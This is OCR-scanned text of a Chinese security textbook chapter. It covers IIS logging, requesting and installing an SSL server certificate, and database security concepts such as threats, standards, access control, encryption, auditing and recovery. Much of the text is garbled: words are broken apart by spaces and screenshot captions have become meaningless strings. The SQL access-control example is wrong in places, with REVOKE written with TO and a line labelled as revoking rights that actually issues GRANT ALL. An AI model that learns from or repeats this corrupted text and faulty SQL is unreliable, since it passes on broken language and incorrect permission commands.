图 13-5 所 示 ; 打开 “扩展 日 志 记 录 属 性 ”对 话 框 ,切换 到 “常规 属性 ”选项 卡 , 单 击 “ 浏 览 ” 按 
钮 或 直接 在 输入 框 中 输入 修改 后 的 日 志 存 放 路 径 , 如 图 13-6 所 示 。 
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图 13-5 “网 站 ”选项 卡 


O 修改 端口 值 。 在 “网 站 ”选项 卡 中 , Web 服务 器 默认 的 TCP 端口 值 为 80, 如 果 将 该 
端口 改 用 其 他 值 , 可 以 增强 安全 性 ,但 会 给 用 户 访问 带 来 不 便 , 系 统管 理 员 可 以 根据 需要 决 
定 是 否 修改 。 


实践 
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口 文 件 命名 和 回 卷 使 用 当地 时 间 CT) 
日 志文 件 目 录 四 ): 
[C: WINDOWSAsystem32 LogFiles E 


日 志文 件 名 :HW3SYCl\exyymndd. log 
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图 13-6 设置 “常规 属性 ” 


2) 用 户 机 的 SSL 配置 

(1) 生成 服务 器 证 书 请 求 文 件 ,操作 如 下 。 

CD Wt“ Internet 服务 管理 器 "窗口 打开 网 络 属性 对 话 框 ,切换 到 “目录 安全 性 ”选项 卡 ， 
如 图 13-7 所 示 。 单 击 “ 安 全 通信 ”选项 组 中 的 “服务 器 证 书 ” 按 钮 ,打开 “IIS 证 书 向 导 ” 对 话 
框 ,如 图 13-8 所 示 。 
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图 13-7 “目录 安全 性 ”选项 卡 


© 选中 “新 建 证 书 ” 单 选 按钮 , 单 击 “ 下 一 步 " 按 钮 ,然后 选择 “现在 准备 证 书 请 求 ,但 稍 
后 发 送 " 单 选 按 钮 ,如 图 13-9 所 示 ; 单 击 “ 下 一 步 ” 按 钮 ,然后 设置 证 书 名 称 和 安全 选项 ,如 
图 13-10 所 示 。 

© 单 击 “ 下 一 步 ” 按 钮 ,然后 设置 证 书 的 组 织 单位 信息 ,如 图 13-11 所 示 ; 单 击 “ 下 一 步 ” 
按钮 ,再 设置 站 点 的 公用 名 称 , 如 图 13-12 所 示 ; 单 击 “ 下 一 步 ” 按 钮 ,再 设置 要 产生 的 证 书 
请 求 文件 名 以 及 路 径 , 如 图 13-13 所 示 。 
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图 13-8 “IIS 证 书 向 导 ” 对 话 框 


ERRAR 
可 以 准备 证 书 请 求 以 备 精 后 发 送 ,也 可 以 立即 发 送 。 


要 准备 证 书 请 求 以 备 稍 后 发 送 ， 或 是 立即 将 其 发 送 到 联机 证 书 籁 发 机 构 ? 
OBICER UEBER , (EIASEYE QD. 
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图 13-9 ”延迟 或 立即 请 求 


IIS 证 书 向 导 


名 称 和 安全 性 设置 
新 证 书 必 须 具有 名 称 和 特定 的 位 长 。 


输入 新 证 书 的 名 称 。 此 名 称 应 易于 引用 和 记忆 。 
ERW: 
EU] 


SrtBeofricdbsE T uF597008732 7, KRK, THH. Pim, fiev 
将 使 性 能 降低 。 


位 长 加 :|:024 ` 
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图 13-10 名 称 和 安全 性 设置 


IIS uF BÉ 


单位 信息 
证 书 必须 包 合 您 单位 的 要 关 信息 ,以便 与 其 地 单位 的 证 书 区 分 开 。 


图 13-11 设置 单位 信息 


站 点 公用 名 称 
站 点 公用 名 称 是 其 完全 合格 的 域名 


图 13-13 设置 文件 名 


@ 单 击 “ 下 一 步 " 按 钮 ,界面 中 将 显示 证 书 请 求 文件 的 摘要 信息 ,如 图 13-14 所 示 , 单 击 
“完成 ”按钮 ,结束 证 书 文件 的 生成 。 
IIS 证 书 向 导 [E 


ARLES 
已 选择 生成 请 求 文件 。 


单 击 “ 下 一 步 ” 近 钮 生成 下 列 请 求 。 
xa. ei Neertreq txt 
语 求 包含 下 列 信息 - 


somem oe | 
1314 ”摘要 信息 


(2) 提交 服务 器 证 书 申请 ,操作 如 下 。 
CD 打开 IE 浏览 器 ,输入 证 书 颂 发 结构 的 URL 地 址 , 单 击 “申请 一 个 证 书 ” 超 链接 ,如 
图 13-15 所 示 。 
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下 载 一 个 CA 证 书 ， 证 书 链 或 CRL 
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图 13-15 ”申请 一 个 证 书 


实践 


© 然后 单 击 “ 高 级 证 书 请 求 " 超 链接 ,如 图 13-16 所 示 ; 然后 选择 第 二 种 方式 ,即使 用 
base 64 编码 的 CMC 或 PKCS #10 文 件 提交 证 书 申请 ,如 图 13-17 所 示 。 


Wc ERO SRW IAD «bo 
me-Q iS d @ P =a € 902 3 Hus 


MR iscing. 166.1. IOV eartarv cer tr aua up 


申请 一 个 证 书 
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或 者 ， 提 次 一 个 高 级 证 书 申请 。 


TT I TT TT [EM 


图 13-16 高 级 证 书 申请 
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高 级 证 书 申请 


CA 的 策略 决定 您 可 以 申请 的 证 书 类 刚 。 单 十 下 列 选 项 之 一 六 : 
创建 并 向 此 ca gi ERR. 
使 用 base64 编码 的 CNC gi PECS tio 文件 提交 一 个 证 书 四 请， 或 使 用 base64 编码 的 _FRCS #7 XCÜPÁBYTIESP PU. 
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图 13-17 CA 的 策略 


C) 填写 申请 表单 .将 前 面 保存 的 证 书 请 求 文件 的 全 部 内 容 复 制 到 “保存 的 申请 ”表单 
中 , 单 击 “ 提 交 ” 按 钮 ,如 图 13-18 所 示 。 此 时 ,证 书 挂 起 ,需要 等 待 服务 器 端的 证 书 管理 员 审 
查 并 颁发 已 经 提交 的 申请 。 


INO MO FV CX IRD EB LJ 


OQ- O md xime 3- mH s 


ET rr re 


加 交 一 个 证 书 申请 或 续 订 申 请 


要 提交 一 个 保存 的 申请 到 Ch8， 在 “ 铝 存 的 申请 “柜员 帖 贴 一 个 由 外 部 淹 (如 Web 服务 器 ) 生 成 的 bese-64 WÁ CHC 或 FkCS #10 ERP 
请 或 PKOS #7 RTRA» 


fun: 
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图 13-18 提交 申请 


(3) 获取 服务 器 证 书 。 在 得 到 服务 器 证 书 颁 发 通知 后 , 即 可 下 载 证 书 , 如 图 13-19 所 
示 。 同 时 ,要 在 颁发 机 构 下 载 证 书 链 , 单 击 * 安 装 此 CA 证 书 链 ” 超 链接 ,使 浏览 器 端 将 CA 
证 书 添加 为 其 根 证 书 , 以 保证 将 自 建 的 CA 能 够 得 到 用 户 端的 信任 ,使 证 书 有 效 , 如 图 13-20 
所 示 。 
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图 13-19 下 载 证 书 


实践 
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下 载 CA 证 书 、 证 书 性 或 CRL 
可 信任 从 这 个 证 书 倾 发 机 构 领 发 的 证 书 ， 安 装 此 CA 证 书 链 . 


要 下 载 一 个 CA 证 书 ， 证 书 钾 或 CRL， 选 择 证 书 和 边 码 方法 、 
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图 13-20 安装 CA 证 书 链 


(4) 安装 服务 器 证 书 。 

通过 “Internet 服务 管理 器 ”窗口 打开 所 选 网 站 属性 ,切换 到 “目录 安全 性 ”选项 卡 , 在 “安全 
通信 ?选项 组 中 选择 服务 器 证 书 , 选 中 * 处 理 挂 起 的 请 求 并 安装 证 书 ” 单 选 按钮 ,如 图 13-21 
所 示 。 


挂 起 的 证 书 请 求 
挂 起 的 证 书 请 求 是 指证 节 烦 发 太 构 尚未 响应 的 请 式 。 
存在 挂 起 的 证 书 请 求 ， MaN 
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A 13-21 挂 起 的 证 书 请 求 


单 击 “ 下 一 步 ?按钮 ,然后 输入 路 径 , 如 图 13-22 Bros s 单 击 * 下 一 步 ? 按 钮 ,界面 中 会 显 
示 所 安装 的 证 书信 息 ; 再 单 击 “ 完 成 ”按钮 ,完成 服务 器 证 书 的 安装 ,如 图 13-23 所 示 。 

安装 完成 后 ,可 以 在 “目录 安全 性 ”选项 卡 中 查看 证 书 , 证 书 为 有 效 。 此 外 ,还 需要 进 一 
步 设置 Web 站 点 的 SSL 选项 , 单 击 “ 编 辑 ” 按 钮 打开 “安全 通信 ”对 话 框 ,选择 “要 求 安 全 通 
道 (SSL)” 复 选项 ,将 强制 浏览 器 与 Web 站 点 建立 SSL 加 密 通 道 ,如 图 13-24 所 示 。 
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处 理 挂 起 的 请 各 
通过 检索 包含 证 书 色 发 机 构 响 应 的 交 件 来 处 理 桂 起 的 证 书 诸 莹 。 


辆 入 包含 证 书 侨 发 机 构 啊 应 的 六 件 的 路 径 和 各 称 。 
路 径 和 文件 名 TD: 
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13-22 ”处 理 挂 起 的 请 求 
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图 13-24 ”安全 通信 设置 
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数据 库 安 全 


随 着 信息 技术 的 不 断 发 展 ,管理 信息 系统 在 社会 各 个 部 门 得 到 了 广 
泛 应 用 ,数据 库 技术 作为 支撑 信息 系统 的 核心 技术 ,其 重要 性 日 益 彰显 。 
信息 系统 应 用 的 逐渐 深入 也 使 得 大 量 重要 、 敏 感 的 信息 以 数据 的 形式 存 
放 在 数据 库 中 ,数据 成 为 一 种 无 形 的 重要 资产 和 极为 宝贵 的 信息 资源 。 
对 数据 完整 性 、 可 用 性 、 机 密 性 的 破坏 以 及 非法 使 用 将 可 能 对 组 织 、 机 构 
乃至 国家 造成 极 大 损失 ,可 见 数据 安全 的 重要 性 不 断 提升 。 同 时 ,在 网 
络 普 及 的 大 背景 下 ,数据 库 系统 面临 的 各 种 安全 威胁 也 迅速 增多 ,数据 
安全 的 实现 面临 诸多 挑战 。 数 据 库 安全 因此 受到 越 来 越 多 学 者 和 研究 
人 员 的 重视 。 目 前 ,数据 库 系统 安全 和 网 络 安全 ,操作 系统 安全 以 及 协 
议 安全 一 起 构成 了 信息 系统 安全 的 4 个 最 主要 的 研究 领域 。 


14.1 数据 库 安 全 概述 
14.1.1 数据 库 安全 的 定义 


数据 库 安全 是 指 为 保证 数据 库 信 息 的 保密 性 、 完 整 性 、 可 用 性 、 可 控 
性 和 可 审查 性 而 建立 的 理论 .技术 和 方法 ,分 为 数据 系统 信息 安全 以 及 
数据 库 系统 运行 安全 。 

数据 信息 安全 是 数据 库 安全 的 核心 。 由 于 数据 库 中 存放 着 大 量 的 
机 密 数据 和 重要 信息 ,所 以 必须 加 强 对 数据 库 的 访问 控制 和 数据 安全 保 
护 , 主 要 包括 用 户口 令 、 用 户 存 取 权 限 控制 .数据 存 取 方式 控制 .审计 跟 
踪 和 数据 加 密 等 。 

数据 库 系统 运行 安全 主要 包括 如 下 几 项 。 

(1) 法 律 的 安全 管理 ,包括 政策 ,法律 的 保护 ,例如 用 户 是 否 合法 , 政 
策 是 否 允 许 等 。 

(2) 物理 数据 库 的 安全 ,数据 库 不 被 各 种 自然 的 和 物理 的 问题 而 破 
坏 , 如 电力 设备 问题 或 者 设备 故障 等 。 

(3) 硬件 安全 ,例如 CPU 是 否 具有 安全 性 方面 的 特性 。 

(4) 操作 系统 协议 以 及 网 络 的 安全 。 

(5) 数据 库 管理 系统 及 其 应 用 程序 本 身 的 安全 性 。 

(6) 防止 电磁 信息 泄露 。 


14.1.2. 数据 库 安 全 受到 的 威胁 


凡是 对 数据 库 内 存储 数据 的 非 授权 的 访问 ( 读 取 ) ,或 非 授权 的 写 和 人 (增加 、 删 除 、 修 改 ) 
等 ,都 属于 对 数据 库 中 数据 安全 的 威胁 。 另 一 方面 ,凡是 正常 业务 需要 访问 数据 库 时 , 令 授 
权 用 户 不 能 正常 得 到 数据 服务 的 攻击 也 称 为 对 数据 库 安 全 的 威胁 。 归 纳 起 来 ,数据 库 安全 
受到 的 威胁 主要 包括 物理 环境 造成 的 威胁 ,计算 机 硬件 的 威胁 、 操 作 系统 以 及 传输 的 威胁 、 
软件 的 故障 及 漏洞 ` 人 为 的 破坏 以 及 届 辑 推理 攻击 等 。 


1. 物理 环境 的 威胁 


物理 环境 的 威胁 主要 指 各 种 自然 灾害 导致 的 硬件 的 破坏 ,从 而 导致 服务 的 中 断 ` 数 据 的 
丢失 或 者 损坏 。 


2. 计算 机 硬件 的 威胁 


硬件 的 威胁 包括 硬件 的 故障 以 及 硬件 本 身 的 安全 漏洞 。 

硬件 的 故障 主要 指正 常 运营 中 非 自然 灾害 导致 的 硬件 故障 ,例如 存储 器 的 故障 、 控 制 器 
故障 .电源 故障 以 及 芯片 和 主板 的 故障 等 。 

硬件 本 身 的 安全 漏洞 不 易 被 发 觉 ,也 更 容易 受到 高 级 黑客 的 攻击 。 


3. 操作 系统 以 及 传输 安全 的 威胁 


数据 库 管 理 系 统 在 操作 系统 中 运行 ,所 以 操作 系统 的 安全 漏洞 会 进一步 影响 数据 库 系 
统 的 安全 性 。 

随 着 互联 网 技术 的 发 展 ,目前 很 多 数据 库 都 基于 网 络 。 在 网 络 环境 中 ,指令 的 调用 以 及 
信息 的 反馈 都 是 通过 网 络 环境 实现 的 ,网 络 传输 的 安全 问题 会 直接 影响 到 数据 库 安全 。 各 
种 有 线 传输 ,无 线 传输 ,甚至 电磁 信息 的 泄露 等 都 有 可 能 导致 数据 的 安全 受到 威胁 。 传 输 安 
全 的 威胁 主要 包括 对 网 上 信息 的 监听 、 用 户 身 份 的 仿冒 以 及 对 用 户 发 出 信息 的 自 改 或 者 否 
认 等 。 

4. 软件 的 故障 及 漏洞 


软件 方面 的 威胁 主要 包括 数据 库 管理 系统 以 及 应 用 程序 的 故障 及 漏洞 。 

数据 库 管理 系统 是 用 户 与 操作 系统 之 间 的 数据 管理 软件 ,但 目前 市 场 上 流行 的 关系 数 
据 库 管理 系统 的 安全 性 往往 存在 漏洞 ,导致 数据 库 系统 的 安全 性 受到 威胁 ,例如 数据 库 的 账 
号 、 密 码 的 泄露 等 。 

应 用 程序 可 以 访问 并 操作 数据 库 中 的 数据 ,如 果 应 用 程序 的 设计 不 合理 或 者 发 生 错误 ， 
将 会 威胁 到 数据 库 的 安全 。 


5. 人 为 的 破坏 


人 为 破坏 包括 以 下 几 种 。 
CD 非 授权 用 户 的 非法 存 取 或 自 改 数据 。 这 可 分 为 两 种 情况 ,一 种 情况 是 由 于 数据 库 


实践 


管理 员 对 数据 库 中 的 数据 的 访问 权限 缺乏 严格 的 控制 与 监督 检查 ,使 得 非 授权 用 户 有 意 或 
者 无 意 地 对 数据 库 中 的 数据 进行 了 存 取 或 者 修改 ,导致 数据 库 系统 内 部 数据 的 泄密 或 破坏 ; 
另 一 种 情况 则 是 非法 用 户 的 恶意 人 侵 ,出 于 不 同 的 目的 ,通过 研究 数据 库 系统 或 者 操作 系统 
的 漏洞 ,利用 病毒 或 者 木马 程序 非法 获取 或 者 算 改 数据 。 

(2) 授权 用 户 的 非法 存 取 或 自 改 数据 。 一 些 授 权 用 户 在 处 理 数据 的 过 程 中 ,在 无 意识 
的 情况 下 对 数据 库 进行 了 错误 的 修改 或 者 由 于 利益 的 驱使 而 修改 数据 库 中 的 数据 ,从 而 使 
自己 得 到 更 多 的 利益 。 

(3) 密 道 。 虽 然 整个 系统 设置 了 安全 保护 ,使 得 整个 数据 库 内 容 不 会 泄露 ,但 黑客 可 以 
通过 密 道 将 数据 一 次 一 位 (bit) 的 方式 慢 慢 泄露 出 去 。 


6. 逻辑 的 威胁 


逻辑 的 威胁 是 指 入 侵 者 虽然 无 法 直接 获得 数据 ,但 可 通过 其 他 合法 获得 的 数据 间接 地 
推理 出 有 用 的 信息 ,从 而 造成 数据 泄露 。 人 逻辑 威胁 可 以 细 分 为 如 下 两 种 情况 。 

(1) 数据 推论 

仅仅 以 一 些 有 限 的 数据 以 及 一 些 常识 或 者 知识 ,就 可 以 推论 出 所 有 的 机 密 数 据 。 例 如 
学 生 的 成 绩 数 据 库 , 可 以 查询 自己 的 学 习 成 绩 以 及 班级 男生 、 女 生平 均 的 学 习 成 绩 , 如 果 班 
级 只 有 一 个 女生 ,就 可 以 通过 查询 班级 女生 的 平均 学 习 成 绩 得 到 该 女生 的 学 习 成 绩 。 

(2) 数据 库 的 聚合 

个 别 数 据 本 身 不 具备 机 密 性 ,但 车 聚合 这 些 数 据 到 某 一 程度 , 则 这 些 数据 就 有 了 机 密 
性 。 例 如 公司 产品 的 销售 额 以 及 销售 数量 ,每 个 数据 独立 开 来 都 不 是 敏感 信息 ,但 如 果 同 时 
获得 就 可 以 计算 出 产品 的 销售 单价 ,竞争 对 手 就 可 以 根据 得 到 的 产品 销售 单价 制定 相应 的 
竞争 策略 。 


14.1.3 数据 库 安全 评估 标准 


为 了 评价 和 保证 数据 库 系 统 的 安全 ,不 少 国家 都 制定 了 数据 库 安全 评估 标准 。1991 年 
4 月 ,美国 国家 计算 机 安全 中 心 颁布 了 关于 TCSEC 的 解释 (可 信 数 据 库 管理 系统 的 解释 》 
(Trusted Database Management System Interpretation. TDI), TDI 与 TCSEC 一 同 使 用 ， 
Jë TCSEC 在 数据 库 管理 系统 方面 的 扩充 和 解释 ,并 从 安全 策略 责任、 保护 和 文档 四 个 方 
面 进 一 步 描述 了 每 级 的 安全 标准 。 

在 我 国 , 军 方 是 最 早 涉及 安全 数据 库 设计 和 开发 的 ,同时 ,也 是 由 军 方 提出 了 我 国 最 早 
的 数据 库 安全 标准 , 即 2001 年 的 (军用 数据 库 安全 评估 准则 》。 公 安 部 也 于 2002 年 发 布 了 
公安 部 行业 标准 GA/T 389-2002《 计 算 机 信息 系统 安全 等 级 保护 数据 库 管理 系统 技术 要 
求 》。 这 两 个 标准 是 我 国 关于 数据 库 安 全 的 直接 标准 。 


14.2 数据 库 安全 实现 技术 


根据 数据 库 受 到 的 威胁 ,数据 库 的 安全 可 以 分 成 4 个 层次 : 实体 安全 层次 .网络 系统 层 
次 、 操 作 系统 层次 以 及 数据 库 管 理 系统 层次 。 本 章 主要 论述 构建 在 数据 库 管理 系统 上 安全 


实现 技术 。 
1. 用 户 标识 与 鉴别 


用 户 标 识 与 鉴别 是 数据 库 系统 提供 的 最 外 层 安 全 保护 措施 。 系 统 提供 一 定 的 方式 让 用 
户 标 识 自己 的 身份 ,只 有 通过 鉴别 的 用 户 才 能 进入 系统 ,获得 系统 授予 的 控制 权 。 用 户 名 以 
及 口令 是 最 简单 的 用 户 标识 和 鉴别 方法 ,一 般 会 规定 口令 的 最 小 长 度 .口令 次 数 、 字 符 选择 、 
有 效 期 等 。 为 了 防止 用 户 名 以 及 密码 被 窃取 ,口令 多 以 加 密 的 形式 进行 存储 。 近 年 来 一 些 
新 的 技术 也 在 数据 库 系 统 集成 中 得 到 应 用 ,例如 数字 证 书 认证 、 智 能 卡 认证 以 及 个 人 特征 
认证 。 

2. 访问 控制 


根据 数据 库 的 安全 要 求 和 存储 数据 的 重要 程度 ,对 不 同安 全 要 求 的 数据 实行 一 定 的 级 
别 控制 。 通 过 对 每 一 个 数据 赋予 不 同 的 密级 以 及 对 不 同 用 户 限 制 访问 数据 的 能 力 ,来 防止 
非法 用 户 的 入 侵 以 及 合法 用 户 的 不 慎 操 作 造 成 的 破坏 。 

传统 的 存 取 控 制 机 制 有 两 种 : 自主 存储 控制 (Discretionary Access Control，DAC) 和 
强制 存 取 控制 (Mandatory Access Control. MAC), 

(1) 自主 存储 控制 

自主 存 取 控制 是 一 种 非常 灵活 的 存储 控制 方法 ,根据 对 用 户 的 标识 以 及 鉴别 ,对 不 同 用 
户 进 行 授 权 。 用 户 对 不 同 的 数据 对 象 具有 不 同 的 存 取 权限 ,不 同 的 用 户 对 于 同一 对 象 也 有 
不 同 的 权限 , 且 用 户 还 可 以 转移 授权 。 

SQL 主要 通过 GRANT 以 及 REVOKE 语句 实现 自主 存 取 控 制 。 数 据 对 象 的 建立 者 
以 及 系统 管理 员 拥有 数据 对 象 的 所 有 操作 权限 以 及 权限 授 出 的 权利 ,授权 接受 用 户 可 以 是 
系统 中 的 任何 用 户 。 

例如 基本 表 salary 的 建立 者 可 以 将 表 的 操作 权限 授予 staffl 以 及 staff2 两 个 不 同 的 用 
户 , 并 在 适当 的 时 候 收回 全 部 或 者 部 分 授权 ,SQL 命令 如 下 。 


GRANT SELECT ON salary TO staff1; 一 -授权 给 staffl 用 户 
GRANT INSERT, UPDATE, DELETE ON salary TO staff2; —— 授权 给 staff2 用 户 
REVOKE SELECT ON salary TO staff1; —— 3t sta££1 权限 回收 
GRANT ALL ON salary TO staff2; 一 -将 staff2 权限 回收 


由 于 自主 存 取 控制 只 是 对 存 取 权限 进行 安全 控制 ,而 没有 对 数据 本 身 进 行 安全 标识 ,所 
以 可 能 存在 数据 的 安全 泄露 问题 ,要 解决 这 个 问题 需要 对 数据 进行 强制 存 取 控 制 。 

(2) 强制 存 取 控 制 

对 于 访问 操作 而 言 ,强制 存 取 控制 将 操作 执行 者 称 为 主体 ,包括 用 户 以 及 代表 用 户 的 进 
程 ; 被 访问 的 对 象 , 包 括 文件 .基本 表 、 视 图 等 各 种 数据 库 对 象 ,被 称 之 为 客体 。 主 体 和 客 
体 在 强制 存 取 控 制 策略 中 被 授予 不 同 的 安全 标记 (Label) ,此 安全 标记 可 分 为 若干 等 级 ， 
如 绝密 、 机 密 、 可 信 、 公 开 等 。 强 制 存 取 控 制 机 制 通过 对 比 主客 体 的 安全 级 别 , 最 终 确 定 
主体 是 否 有 权 访 问 客体 ,例如 仅 当 主体 的 许可 证 级 别 等 于 客体 的 密级 时 ,主体 才能 对 客 
体 执 行 写 操作 ; 仅 当主 体 的 许可 证 级 别 大 于 或 等 于 客体 的 密级 时 ,主体 才能 对 客体 执行 
读 操作 。 


实践 


近年 来 ,基于 角色 的 存 取 控制 (Role-Based Access Control,RBAC) 得 到 了 越 来 越 多 的 
关注 ,其 核心 思想 是 将 访问 权限 与 角色 相 联系 ,通过 给 用 户 分 配合 适 的 角色 ,对 每 个 角色 授 
也 若干 不 同 的 特权 。 系 统 可 以 添加 删除 角色 ,也 可 以 对 角色 的 权限 进行 添加 删除 。 
RBAC 大 大 简化 了 授权 管理 , 既 可 以 实现 自动 存 取 控 制 ,又 可 以 实现 强制 存 取 控 制 , 可 以 将 
安全 性 放 在 一 个 接近 组 织 结构 的 自然 层面 上 进行 管理 ,被 认为 是 一 种 普遍 适用 的 访问 控制 
模型 。 


3. 数据 库 加 密 


为 了 防止 利用 网 络 协议 ,操作 系统 安全 漏洞 绕 过 数据 库 的 安全 机 制 直接 访问 数据 库 文 
件 ,有 必要 对 数据 库 文件 进行 加 密 。 这 样 即使 数据 不 幸 泄露 或 者 丢失 ,也 难以 被 人 破译 和 阅 
读 。 另 一 方面 ,不 能 因为 数据 的 加 密使 得 数据 库 的 操作 复杂 化 和 影响 数据 库 系统 的 性 能 。 
因此 ,一 个 良好 的 数据 库 加 密 系统 应 该 满足 以 下 4 个 基本 要 求 。 

(1) 支持 各 种 粒度 的 数据 加 密 

一 般 来 说 ,数据 库 加 密 的 粒度 有 表 、 属 性 .记录 和 数据 项 。 加 密 粒 度 越 小 灵活 度 越 高 ,但 
技术 也 更 复杂 。 

(2) 良好 的 密 钥 管理 机 制 

数据 库 加 密 产生 的 密 钥 量 很 大 ,在 极端 情况 下 每 个 加 密 数据 项 都 需要 一 个 密 钥 , 因 此 需 
要 一 个 良好 的 密 钥 管理 机 制 。 密 钥 管理 一 般 有 集中 密 钥 管理 和 多 级 密 钥 管理 两 种 机 制 。 集 
中 密 钥 管理 的 密 钥 一 般 由 数据 库 管 理 员 控制 ,权利 非常 集中 ,但 目前 应 用 较 多 的 还 是 多 级 密 
钥 管理 机 制 。 

(3) 合理 处 理 数据 

这 包括 几 个 方面 的 内 容 , 首 先 要 恰当 处 理 数据 类 型 ,否则 数据 库 管理 系统 将 会 因为 加 密 
后 的 数据 不 符合 定义 的 数据 类 型 而 拒绝 加 载 ; 其 次 ,需要 处 理 数 据 的 存储 问题 ,实现 数据 库 
加 密 后 ,应 该 基本 上 不 增加 存储 空间 开销 。 

(4) 不 影响 合法 用 户 的 操作 

加 密 后 对 数据 操作 的 时 间 的 影响 应 该 尽量 短 , 在 目前 阶段 ,平均 延迟 时 间 不 应 超过 0. 1 
秒 。 此 外 ,对 于 数据 库 的 合法 用 户 来 说 ,数据 库 数 据 的 录入 、 人 和 修改、 删除 和 检索 操作 等 都 应 该 
是 透明 的 ,不 需要 考虑 数据 的 加 密 与 解密 问题 。 

在 满足 上 述 要 求 后 ,可 以 根据 不 同 数据 库 的 特点 进行 加 密 ,加 密 方式 一 般 可 分 为 硬件 加 
密 与 软件 加 密 。 硬 件 加 密 需 要 在 数据 库 管理 系统 和 数据 存储 的 物理 介质 之 间 加 装 一 个 硬件 
装置 ,使 实际 的 数据 与 管理 系统 脱离 。 

软件 加 密 更 依赖 于 数据 库 管理 系统 ,是 一 个 更 常用 的 加 密 方式 ,又 可 以 分 成 库 内 加 密 与 
库 外 加 密 两 种 。 

库 内 加 密 是 将 数据 在 数据 库 管 理 系统 的 内 核 层 进行 加 密 。 算 法 镶嵌 在 数据 库 管理 系统 
的 内 部 ,只 有 采用 特定 的 数据 库 管理 系统 才能 阅读 加 密 数据 。 这 种 加 密 方法 的 优点 是 加 密 
功能 强 ,而且 加 密 功 能 与 数据 库 管 理 系统 无 颖 耦合 .不 会 影响 系统 功能 ; 同时 ,这 种 方式 对 
用 户 来 说 是 透明 的 ,减轻 了 用 户 的 负担 。 这 种 方式 的 缺点 是 对 系统 性 能 影响 较 大 , 且 密 钥 安 
全 管理 的 风险 较 大 。 

库 外 加 密 是 在 数据 库 管 理 系统 之 外 对 数据 进行 加 解密 ,数据 库 中 存储 的 是 密 文 。 加 解 


密 过 程 可 以 在 客户 端 实现 ,也 可 以 有 专门 的 加 密 服 务 器 完成 。 库 外 加 密 的 优点 是 减 小 了 数 
据 库 服务 器 与 数据 库 管理 系统 的 运行 负担 ; 可 以 将 密 钥 与 所 加 密 的 数据 分 开 保存 ,提高 了 
安全 性 ; 有 客户 端 与 服务 器 配合 ,可 以 实现 端 到 端的 网 上 密 文 传输 。 它 的 缺点 是 加 密 后 的 
数据 库 功 能 受到 一 定 的 限制 。 


4. 数据 库 审计 


数据 库 系统 审计 是 指 监视 和 记录 用 户 对 数据 库 所 施加 的 各 种 操作 的 机 制 。 按 照 美国 国 
防 部 TCSEC/TDI 标准 中 关于 安全 策略 的 要 求 ,审计 功能 是 数据 库 系 统 达到 C2 以 上 安全 
级 别 必 不 可 少 的 一 项 指标 。 通 过 审计 ,系统 安全 员 可 以 把 用 户 对 数据 库 的 所 有 操作 记录 下 
来 放 入 审计 日 志 , 事 后 可 以 利用 这 些 信 息 重 现 导 致 数据 库 现 有 状况 的 一 系列 事件 , 找 出 非法 
存 取 数据 的 人 、 时 间 、 内 容 等 。 同 时 ,由 于 审计 系统 可 以 跟踪 用 户 的 全 部 操作 ,这 也 使 得 审计 
系统 具有 一 种 威慑 力 ,提醒 用 户 合法 安全 使 用 数据 库 。 数 据 库 审计 主要 包括 如 下 功能 。 

(1) 实时 监测 并 智能 分 析 、 还 原 各 种 数据 库 操作 。 

(2) 根据 规则 设 定 , 及 时 阻 断 违规 操作 ,保护 数据 。 

(3) 实现 对 数据 库 系统 漏洞 ` 登 录 账 号 .登录 工具 和 数据 操作 过 程 的 跟踪 ,发现 对 数据 
库 系 统 的 异常 应 用 。 

(4) 支持 对 登录 用 户 ,数据库 表 明 、 字 有 段 名 及 关键 字 等 内 容 进行 多 种 条 件 组 合 的 规则 设 
定 , 形 成 灵活 的 审计 策略 。 

(5) 提供 包括 记录 、 报 警 和 中 断 等 多 种 相应 措施 。 

(6) 具备 强大 的 查询 统计 功能 ,可 生成 专业 化 的 报表 。 


5. 推理 控制 


恶意 用 户 能 利用 数据 之 间 的 相互 联系 推理 出 其 不 能 直接 访问 的 数据 ,从 而 获得 敏感 数 
据 。 推 理 控制 则 针对 这 一 威胁 采取 措施 检测 与 消除 推理 通道 。 常 见 的 推理 通道 有 4 种 ,一 
是 执行 多 次 查询 ,利用 查询 结果 之 间 的 逻辑 结果 进行 推理 ; 二 是 利用 不 同 数据 之 间 的 函数 
依赖 进行 推理 分 析 ; 三 是 利用 数据 完整 性 约束 进行 推理 ; 四 是 利用 分 级 约束 进行 推理 。 目 
前 常用 的 推理 控制 的 方法 可 以 分 为 两 类 ,第 一 类 是 在 数据 库 设计 时 找 出 推理 通道 ,然后 修改 
数据 库 设计 或 者 提高 一 些 数据 项 的 安全 级 别 来 消除 推理 通道 ; 第 二 类 是 在 数据 库 运 行 时 找 
到 推理 通道 ,通过 多 实例 方法 和 查询 修改 方法 来 实现 推理 控制 。 但 至 今 仍然 没有 一 种 方法 
可 以 从 根本 上 解决 推理 问题 ,这 是 由 推理 问题 本 身 的 多 样 性 以 及 不 确定 性 决定 的 。 


6. 备份 与 恢复 


尽管 采取 了 各 种 措施 防止 数据 库 系统 被 破坏 ,但 计算 机 系统 中 硬件 的 故障 、 软 件 的 错 
误 , 操 作 员 的 失误 以 及 恶意 的 破坏 仍 是 不 可 避免 的 。 这 些 故 障 轻 则 造成 运行 事务 非 正常 中 
断 , 重 则 破坏 数据 库 , 使 数据 库 中 的 数据 部 分 或 者 全 部 丢失 。 因 此 数据 库 必须 具有 备份 及 恢 
复 功 能 。 
建立 备份 数据 库 最 常用 的 方法 就 是 数据 转 储 以 及 日 志文 件 登记 。 数 据 库 的 镜像 技术 可 
以 看 成 数据 转 储 的 一 种 形式 。 

数据 库 的 恢复 是 指 在 系统 发 生 故 障 后 ,把 数据 恢复 到 原来 状态 的 技术 。 根 据 数据 库 备 


实践 


份 的 情况 不 同 ,数据 库 的 恢复 技术 一 般 有 3 种 策略 ,分 别 为 基于 数据 转 储 的 恢复 .基于 日 志 
文件 的 恢复 以 及 基于 镜像 数据 库 的 恢复 。 

(1) 基于 数据 转 储 的 恢复 。 当 数据 库 失效 时 ,可 取 最 近 一 次 的 数据 库 备 份 来 恢复 数据 
库 , 通 过 这 种 方法 ,数据库 只 能 恢复 到 最 近 一 次 备份 的 状态 ,而 从 最 近 备 份 到 故障 发 生 期 间 
的 所 有 数据 库 更 新 将 会 丢失 。 

(2) 基于 日 志文 件 的 恢复 。 由 于 运行 日 志 中 记录 着 数据 库 每 一 次 的 更 新 ,在 数据 库 恢 
复 时 ,系统 可 以 通过 对 日 志文 件 的 自动 扫描 来 对 数据 库 进行 恢复 。 具 体 方法 是 : 将 故障 发 
